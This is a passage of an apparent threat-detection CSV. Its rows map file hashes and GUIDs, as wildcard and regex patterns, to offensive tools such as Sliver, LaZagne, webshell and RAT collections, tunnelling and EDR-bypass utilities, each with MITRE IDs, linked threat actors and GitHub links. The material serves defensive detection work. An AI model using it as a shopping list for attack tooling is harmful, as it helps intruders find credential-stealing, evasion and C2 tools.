"*f9b96ad88884c71b8a0d911ebdcb01fe871d795354c4fbd66b705ee7120d83a3*",".{0,1000}f9b96ad88884c71b8a0d911ebdcb01fe871d795354c4fbd66b705ee7120d83a3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44319"
"*f9bfe5ec7093e75a2baeb578e87084aa65cd5bc5bd4ffaa4c3d4f9e051cd6a00*",".{0,1000}f9bfe5ec7093e75a2baeb578e87084aa65cd5bc5bd4ffaa4c3d4f9e051cd6a00.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#filehash","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","44320"
"*f9bfe85b5bad130a6e0d3aaed75193779e150e88613fa1617470cf29d11a05b1*",".{0,1000}f9bfe85b5bad130a6e0d3aaed75193779e150e88613fa1617470cf29d11a05b1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","44321"
"*f9c1f7d62460e7ab424bacb00361ec645816cf478c9308ede41ac926c5012db3*",".{0,1000}f9c1f7d62460e7ab424bacb00361ec645816cf478c9308ede41ac926c5012db3.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","44322"
"*f9d5a4845037c07016edfcd1510066195d7c86dea9db7cbf93b0f7f6c2ba0e3b*",".{0,1000}f9d5a4845037c07016edfcd1510066195d7c86dea9db7cbf93b0f7f6c2ba0e3b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44326"
"*f9da84d51a436405bfde86e2a5abbb4bd19cc1226bc07a9f89c1153437a70797*",".{0,1000}f9da84d51a436405bfde86e2a5abbb4bd19cc1226bc07a9f89c1153437a70797.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44327"
"*f9e0d5910c1883ad6c902d895ebd813018ad7e5a0b4f5988d0c2ed861e9e08de*",".{0,1000}f9e0d5910c1883ad6c902d895ebd813018ad7e5a0b4f5988d0c2ed861e9e08de.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","44329"
"*f9e0e800766e3a28d93ec6f55de8d2c64204d87162898d977eb3156c9cebb24b*",".{0,1000}f9e0e800766e3a28d93ec6f55de8d2c64204d87162898d977eb3156c9cebb24b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44330"
"*f9e6aa0e6653bcff0739514717f94111919bc48c44babe38cadb092878e37fbf*",".{0,1000}f9e6aa0e6653bcff0739514717f94111919bc48c44babe38cadb092878e37fbf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44331"
"*f9ecfddee46fd760c809c843dc86c2bf7b9dfe1ac9ad932f782fb0ed6e34a23e*",".{0,1000}f9ecfddee46fd760c809c843dc86c2bf7b9dfe1ac9ad932f782fb0ed6e34a23e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44333"
"*f9ee736ac087001620103f7f42f06cbfc4aa7e37d7f2e1f9b0f10abd6c4349b1*",".{0,1000}f9ee736ac087001620103f7f42f06cbfc4aa7e37d7f2e1f9b0f10abd6c4349b1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44334"
"*f9ef944aa1980e6ed8153cb2c8926559203d9aa6e1db388efbeabb705d9fe57f*",".{0,1000}f9ef944aa1980e6ed8153cb2c8926559203d9aa6e1db388efbeabb705d9fe57f.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","44335"
"*f9fdfa324c6c8d1e73da339f92f03a275e3f847082350a2881cca8c14e401d23*",".{0,1000}f9fdfa324c6c8d1e73da339f92f03a275e3f847082350a2881cca8c14e401d23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44337"
"*f9fe9036adf02a76fc87d26245d0b8db539a16fc4b420f0a7e613a68a1f1ede1*",".{0,1000}f9fe9036adf02a76fc87d26245d0b8db539a16fc4b420f0a7e613a68a1f1ede1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44338"
"*fa00de3a5f4f0fd4f20a4c8cac94e67c13508d45f35d19ea5e4847c2a7a48814*",".{0,1000}fa00de3a5f4f0fd4f20a4c8cac94e67c13508d45f35d19ea5e4847c2a7a48814.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","44339"
"*fa06c45e4522706565bea7e2532ba67cf2cad3e57e38157c09e46445c1dd100a*",".{0,1000}fa06c45e4522706565bea7e2532ba67cf2cad3e57e38157c09e46445c1dd100a.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#filehash","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","44341"
"*FA0DAF13-5058-4382-AE07-65E44AFB5592*",".{0,1000}FA0DAF13\-5058\-4382\-AE07\-65E44AFB5592.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","#GUIDproject","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","44342"
"*fa13cf651b92aff3ee0b74b557c9751444dabef783e511dcbafc15951cfbcb01*",".{0,1000}fa13cf651b92aff3ee0b74b557c9751444dabef783e511dcbafc15951cfbcb01.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44343"
"*fa180238fde76bf5bab9300dadbf245b8c4d51deb46bba8d6b8f2a5fd1e99bb2*",".{0,1000}fa180238fde76bf5bab9300dadbf245b8c4d51deb46bba8d6b8f2a5fd1e99bb2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44344"
"*fa198e37820eeffb222b11bd1c6ced342167f1b6c9556aea77a048195a3fa74f*",".{0,1000}fa198e37820eeffb222b11bd1c6ced342167f1b6c9556aea77a048195a3fa74f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44347"
"*fa1b7e541e359317e69e48d0f089cfe83a6c8acf04d4c0ed44d76b38cc97e40f*",".{0,1000}fa1b7e541e359317e69e48d0f089cfe83a6c8acf04d4c0ed44d76b38cc97e40f.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","44348"
"*fa1d33fe72c69de384fe29f15ba46074e8c4b1a0a7e884fb0dddde4149775f08*",".{0,1000}fa1d33fe72c69de384fe29f15ba46074e8c4b1a0a7e884fb0dddde4149775f08.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44349"
"*fa1fa604b788cc583542e6ea92a9a7802efc55422c9bc18ddadc04d8b5683329*",".{0,1000}fa1fa604b788cc583542e6ea92a9a7802efc55422c9bc18ddadc04d8b5683329.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44350"
"*FA2052FB-9E23-43C8-A0EF-43BBB710DC61*",".{0,1000}FA2052FB\-9E23\-43C8\-A0EF\-43BBB710DC61.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","The VSTO's GUID","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","44351"
"*fa2061026851e6e86d3fec6347eebf2e4fb11284c6e36c3a2b018dcf5e762447*",".{0,1000}fa2061026851e6e86d3fec6347eebf2e4fb11284c6e36c3a2b018dcf5e762447.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44352"
"*fa220acf9aa2972ac3ed01e854cfa219e017a533c0e629740b03151cf962dd91*",".{0,1000}fa220acf9aa2972ac3ed01e854cfa219e017a533c0e629740b03151cf962dd91.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44353"
"*fa32eb358101485802c331ffe1a8d5bda5069322f489e15fc1665c3c088c558c*",".{0,1000}fa32eb358101485802c331ffe1a8d5bda5069322f489e15fc1665c3c088c558c.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","44355"
"*fa3708cf1fdbefc4aea12781f5f7250388d95e83ba5ae9df08940fd31c1883ff*",".{0,1000}fa3708cf1fdbefc4aea12781f5f7250388d95e83ba5ae9df08940fd31c1883ff.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44356"
"*fa37922b4ab1d0daa46c4beebfe591c916dbd55756da4e4f361a8c311bd2aee0*",".{0,1000}fa37922b4ab1d0daa46c4beebfe591c916dbd55756da4e4f361a8c311bd2aee0.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44357"
"*fa3de04b165bd518b476d23212d3b7ed1b92a600acba4f01ec35213f0efe1467*",".{0,1000}fa3de04b165bd518b476d23212d3b7ed1b92a600acba4f01ec35213f0efe1467.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44358"
"*fa3ff4c4ead31c5754d9cd83bbee29512cfa4929722594998199e8fd51ae3bfb*",".{0,1000}fa3ff4c4ead31c5754d9cd83bbee29512cfa4929722594998199e8fd51ae3bfb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44359"
"*fa58b987e702e4213705ec9bfa01955f9cf4f5f4b8c43e91344bd8f997f83712*",".{0,1000}fa58b987e702e4213705ec9bfa01955f9cf4f5f4b8c43e91344bd8f997f83712.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44362"
"*fa63c897e614a228f3b176c98d8dee797c8df24ff7e487b023715255621ed292*",".{0,1000}fa63c897e614a228f3b176c98d8dee797c8df24ff7e487b023715255621ed292.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44363"
"*fa66e3077a51a5ef7cb29ab869b483d7363e9bb58d84595de4e0b2b48e3df47b*",".{0,1000}fa66e3077a51a5ef7cb29ab869b483d7363e9bb58d84595de4e0b2b48e3df47b.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44364"
"*fa7433173643095d5266fd465f88de45d6d157d72dc5915ab1334c03af63b4ba*",".{0,1000}fa7433173643095d5266fd465f88de45d6d157d72dc5915ab1334c03af63b4ba.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44366"
"*fa769dac7a0a94ee47d8ebe021eaba9e*",".{0,1000}fa769dac7a0a94ee47d8ebe021eaba9e.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","N/A","default password md5","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","44367"
"*fa77365a2b757aa8e3c0dea845aeb2e0ac77ab0f6138c140fd165da72ebbf098*",".{0,1000}fa77365a2b757aa8e3c0dea845aeb2e0ac77ab0f6138c140fd165da72ebbf098.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44368"
"*fa7c589beeed7dfb870fb784b265063facd3b007c454256107e76bdc5991f422*",".{0,1000}fa7c589beeed7dfb870fb784b265063facd3b007c454256107e76bdc5991f422.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44369"
"*fa7eba4a7edb75f644eace116b7072d9edddfa0af672bd99091d9035b974ba21*",".{0,1000}fa7eba4a7edb75f644eace116b7072d9edddfa0af672bd99091d9035b974ba21.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","44370"
"*fa88cbb335f5284f0c23e4182474314ab936ac37a6f0099e7539e2a0e992d255*",".{0,1000}fa88cbb335f5284f0c23e4182474314ab936ac37a6f0099e7539e2a0e992d255.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","44372"
"*fa8addfe13555c20633386fe8c9ceda53336fada732d984c214632ebb73063f2*",".{0,1000}fa8addfe13555c20633386fe8c9ceda53336fada732d984c214632ebb73063f2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44373"
"*fa8ea8f183235df6d194ee66f9289be6e5020000d9eea029a3788da393db3b4a*",".{0,1000}fa8ea8f183235df6d194ee66f9289be6e5020000d9eea029a3788da393db3b4a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44374"
"*fa8ff7e30ab51f8331ad6d9792d470406de52d66681c2b788361eb578558f913*",".{0,1000}fa8ff7e30ab51f8331ad6d9792d470406de52d66681c2b788361eb578558f913.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","44375"
"*fa9719d556cd1b8b951f7c1f561881c99da7cf41f25c41d8a87fab113144226a*",".{0,1000}fa9719d556cd1b8b951f7c1f561881c99da7cf41f25c41d8a87fab113144226a.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","44376"
"*fa994debde4c3fc87853ccf7667ed991e2c77a21c3ddd54c024588372a96d831*",".{0,1000}fa994debde4c3fc87853ccf7667ed991e2c77a21c3ddd54c024588372a96d831.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44378"
